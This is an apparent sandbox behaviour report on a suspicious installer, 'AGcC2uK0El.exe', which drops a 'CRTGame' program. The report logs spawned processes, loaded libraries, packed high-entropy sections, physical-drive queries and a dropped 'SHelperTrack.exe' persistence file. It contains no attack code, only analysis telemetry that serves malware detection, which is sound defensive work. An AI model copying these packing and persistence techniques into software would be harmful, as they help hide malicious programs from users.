                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeFile read: C:\Users\user\Desktop\AGcC2uK0El.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\AGcC2uK0El.exe "C:\Users\user\Desktop\AGcC2uK0El.exe"
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeProcess created: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp "C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp" /SL5="$10480,7025884,54272,C:\Users\user\Desktop\AGcC2uK0El.exe"
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Query
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpProcess created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -i
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" helpmsg 10
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpProcess created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -s
                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 10
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeProcess created: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp "C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp" /SL5="$10480,7025884,54272,C:\Users\user\Desktop\AGcC2uK0El.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /QueryJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpProcess created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -iJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" helpmsg 10Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpProcess created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -sJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 10Jump to behavior
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpSection loaded: shfolder.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpSection loaded: sfc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: version.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: version.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpWindow found: window name: TMainFormJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: AGcC2uK0El.exeStatic file information: File size 7280524 > 1048576
                  Source: Binary string: X:\delphi\xrecode3\src\c\DLL\visualc\libmp4v2\bin\Windows-Win32\Release\libmp4v2.pdb source: is-ODQUV.tmp.1.dr
                  Source: Binary string: D:\lame-3.100-SVN-20200409\Dll\Win32\Release NASM\lame_enc.pdb source: is-GN0SC.tmp.1.dr

                  Data Obfuscation

                  barindex
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeUnpacked PE file: 5.2.crtgame.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.hsave:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeUnpacked PE file: 5.2.crtgame.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0044C030 LoadLibraryA,GetProcAddress,GetProcAddress,1_2_0044C030
                  Source: initial sampleStatic PE information: section where entry point is pointing to: petite
                  Source: crtgame.exe.1.drStatic PE information: section name: .hsave
                  Source: is-HLDR5.tmp.1.drStatic PE information: section name: /4
                  Source: is-CHRTV.tmp.1.drStatic PE information: section name: /4
                  Source: is-LP9D8.tmp.1.drStatic PE information: section name: /4
                  Source: is-E5NVS.tmp.1.drStatic PE information: section name: /4
                  Source: is-E5NVS.tmp.1.drStatic PE information: section name: /19
                  Source: is-E5NVS.tmp.1.drStatic PE information: section name: /31
                  Source: is-E5NVS.tmp.1.drStatic PE information: section name: /45
                  Source: is-E5NVS.tmp.1.drStatic PE information: section name: /57
                  Source: is-E5NVS.tmp.1.drStatic PE information: section name: /70
                  Source: is-E5NVS.tmp.1.drStatic PE information: section name: /81
                  Source: is-E5NVS.tmp.1.drStatic PE information: section name: /92
                  Source: is-GN0SC.tmp.1.drStatic PE information: section name: .trace
                  Source: is-GN0SC.tmp.1.drStatic PE information: section name: _RDATA
                  Source: is-GN0SC.tmp.1.drStatic PE information: section name: .debug_o
                  Source: is-RJL72.tmp.1.drStatic PE information: section name: /4
                  Source: is-H6A9P.tmp.1.drStatic PE information: section name: /4
                  Source: is-PJ2FQ.tmp.1.drStatic PE information: section name: /4
                  Source: is-OSQAA.tmp.1.drStatic PE information: section name: /4
                  Source: is-5JD36.tmp.1.drStatic PE information: section name: /4
                  Source: is-O51E5.tmp.1.drStatic PE information: section name: /4
                  Source: is-6S6NV.tmp.1.drStatic PE information: section name: /4
                  Source: is-8JJ67.tmp.1.drStatic PE information: section name: /4
                  Source: is-I5CC7.tmp.1.drStatic PE information: section name: /4
                  Source: is-ULG4P.tmp.1.drStatic PE information: section name:
                  Source: is-ULG4P.tmp.1.drStatic PE information: section name:
                  Source: is-ULG4P.tmp.1.drStatic PE information: section name: petite
                  Source: is-HP7BQ.tmp.1.drStatic PE information: section name: /4
                  Source: is-EATSP.tmp.1.drStatic PE information: section name:
                  Source: is-EATSP.tmp.1.drStatic PE information: section name:
                  Source: is-EATSP.tmp.1.drStatic PE information: section name: petite
                  Source: is-JORH4.tmp.1.drStatic PE information: section name:
                  Source: is-JORH4.tmp.1.drStatic PE information: section name:
                  Source: is-JORH4.tmp.1.drStatic PE information: section name: petite
                  Source: is-RGK44.tmp.1.drStatic PE information: section name:
                  Source: is-RGK44.tmp.1.drStatic PE information: section name: petite
                  Source: is-6ND5B.tmp.1.drStatic PE information: section name:
                  Source: is-6ND5B.tmp.1.drStatic PE information: section name:
                  Source: is-6ND5B.tmp.1.drStatic PE information: section name: petite
                  Source: is-GSGD0.tmp.1.drStatic PE information: section name: /4
                  Source: is-AMJ3K.tmp.1.drStatic PE information: section name: .sxdata
                  Source: is-D10RQ.tmp.1.drStatic PE information: section name: .didata
                  Source: is-PJ8MN.tmp.1.drStatic PE information: section name:
                  Source: is-PJ8MN.tmp.1.drStatic PE information: section name:
                  Source: is-PJ8MN.tmp.1.drStatic PE information: section name: petite
                  Source: is-RJI5O.tmp.1.drStatic PE information: section name:
                  Source: is-RJI5O.tmp.1.drStatic PE information: section name: petite
                  Source: is-JU8A8.tmp.1.drStatic PE information: section name:
                  Source: is-JU8A8.tmp.1.drStatic PE information: section name:
                  Source: is-JU8A8.tmp.1.drStatic PE information: section name:
                  Source: is-930UV.tmp.1.drStatic PE information: section name:
                  Source: is-930UV.tmp.1.drStatic PE information: section name:
                  Source: is-930UV.tmp.1.drStatic PE information: section name: petite
                  Source: is-8DLTN.tmp.1.drStatic PE information: section name:
                  Source: is-8DLTN.tmp.1.drStatic PE information: section name:
                  Source: is-8DLTN.tmp.1.drStatic PE information: section name:
                  Source: is-M07BP.tmp.1.drStatic PE information: section name:
                  Source: is-M07BP.tmp.1.drStatic PE information: section name:
                  Source: is-M07BP.tmp.1.drStatic PE information: section name: petite
                  Source: is-FBHNA.tmp.1.drStatic PE information: section name:
                  Source: is-FBHNA.tmp.1.drStatic PE information: section name:
                  Source: is-FBHNA.tmp.1.drStatic PE information: section name: petite
                  Source: is-5QDBA.tmp.1.drStatic PE information: section name:
                  Source: is-5QDBA.tmp.1.drStatic PE information: section name:
                  Source: is-5QDBA.tmp.1.drStatic PE information: section name:
                  Source: is-IM6II.tmp.1.drStatic PE information: section name:
                  Source: is-IM6II.tmp.1.drStatic PE information: section name:
                  Source: is-IM6II.tmp.1.drStatic PE information: section name: petite
                  Source: is-4CPU3.tmp.1.drStatic PE information: section name: /4
                  Source: is-MDQ87.tmp.1.drStatic PE information: section name: /4
                  Source: is-PJQ9V.tmp.1.drStatic PE information: section name: /4
                  Source: is-DG85B.tmp.1.drStatic PE information: section name: /4
                  Source: is-P33NB.tmp.1.drStatic PE information: section name:
                  Source: is-P33NB.tmp.1.drStatic PE information: section name:
                  Source: is-P33NB.tmp.1.drStatic PE information: section name:
                  Source: is-JISVL.tmp.1.drStatic PE information: section name: /4
                  Source: is-UVN7O.tmp.1.drStatic PE information: section name: .eh_fram
                  Source: is-KU7UG.tmp.1.drStatic PE information: section name: asmcode
                  Source: is-J56NG.tmp.1.drStatic PE information: section name: .eh_fram
                  Source: is-2V0OO.tmp.1.drStatic PE information: section name: /4
                  Source: is-LVBK5.tmp.1.drStatic PE information: section name: /4
                  Source: is-QQL7E.tmp.1.drStatic PE information: section name: /4
                  Source: SHelperTrack.exe.5.drStatic PE information: section name: .hsave
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeCode function: 0_2_004065B8 push 004065F5h; ret 0_2_004065ED
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeCode function: 0_2_004040B5 push eax; ret 0_2_004040F1
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeCode function: 0_2_00408104 push ecx; mov dword ptr [esp], eax0_2_00408109
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeCode function: 0_2_00404185 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeCode function: 0_2_00404206 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeCode function: 0_2_0040C218 push eax; ret 0_2_0040C219
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeCode function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeCode function: 0_2_00404283 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeCode function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00409954 push 00409991h; ret 1_2_00409989
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0040A04F push ds; ret 1_2_0040A050
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0040A023 push ds; ret 1_2_0040A04D
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_004062CC push ecx; mov dword ptr [esp], eax1_2_004062CD
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_004822F4 push 004823D2h; ret 1_2_004823CA
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_004765B0 push ecx; mov dword ptr [esp], edx1_2_004765B1
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_004106E0 push ecx; mov dword ptr [esp], edx1_2_004106E5
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00412938 push 0041299Bh; ret 1_2_00412993
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_004589F0 push 00458A34h; ret 1_2_00458A2C
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00442C94 push ecx; mov dword ptr [esp], ecx1_2_00442C98
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00450E58 push 00450E8Bh; ret 1_2_00450E83
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0045101C push ecx; mov dword ptr [esp], eax1_2_00451021
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0040D038 push ecx; mov dword ptr [esp], edx1_2_0040D03A
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0049310C push ecx; mov dword ptr [esp], ecx1_2_00493111
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_004571B0 push 004571E8h; ret 1_2_004571E0
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0045F444 push ecx; mov dword ptr [esp], ecx1_2_0045F448
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0040546D push eax; ret 1_2_004054A9
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0040553D push 00405749h; ret 1_2_00405741
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0040F598 push ecx; mov dword ptr [esp], edx1_2_0040F59A
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_004055BE push 00405749h; ret 1_2_00405741
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0040563B push 00405749h; ret 1_2_00405741
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
                  Source: crtgame.exe.1.drStatic PE information: section name: .text entropy: 7.606165768727154
                  Source: is-JU8A8.tmp.1.drStatic PE information: section name: entropy: 7.953893773659523
                  Source: is-8DLTN.tmp.1.drStatic PE information: section name: entropy: 7.921519965168042
                  Source: is-FBHNA.tmp.1.drStatic PE information: section name: entropy: 7.966771808365004
                  Source: is-5QDBA.tmp.1.drStatic PE information: section name: entropy: 7.950928332152424
                  Source: is-P33NB.tmp.1.drStatic PE information: section name: entropy: 7.491817342209834
                  Source: SHelperTrack.exe.5.drStatic PE information: section name: .text entropy: 7.606165768727154

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive05_2_00401A58
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive07_2_02C4F29C
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-RJL72.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\takdec.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\lame_enc.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-RJI5O.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-5JD36.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-P33NB.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-ULG4P.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-8DLTN.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Users\user\AppData\Local\Temp\is-J0EI4.tmp\_isetup\_iscrypt.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-GN0SC.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-H6A9P.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-9A8PJ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Users\user\AppData\Local\Temp\is-J0EI4.tmp\_isetup\_shfoldr.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-6ND5B.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-J56NG.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-CHRTV.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-PJQ9V.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-AMJ3K.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-MDQ87.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-ODQUV.tmpJump to dropped file
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile created: C:\ProgramData\SHelperTrack\SHelperTrack.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-OSQAA.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-2V0OO.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-HLDR5.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-UVN7O.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-JORH4.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\sd.dll (copy)Jump to dropped file
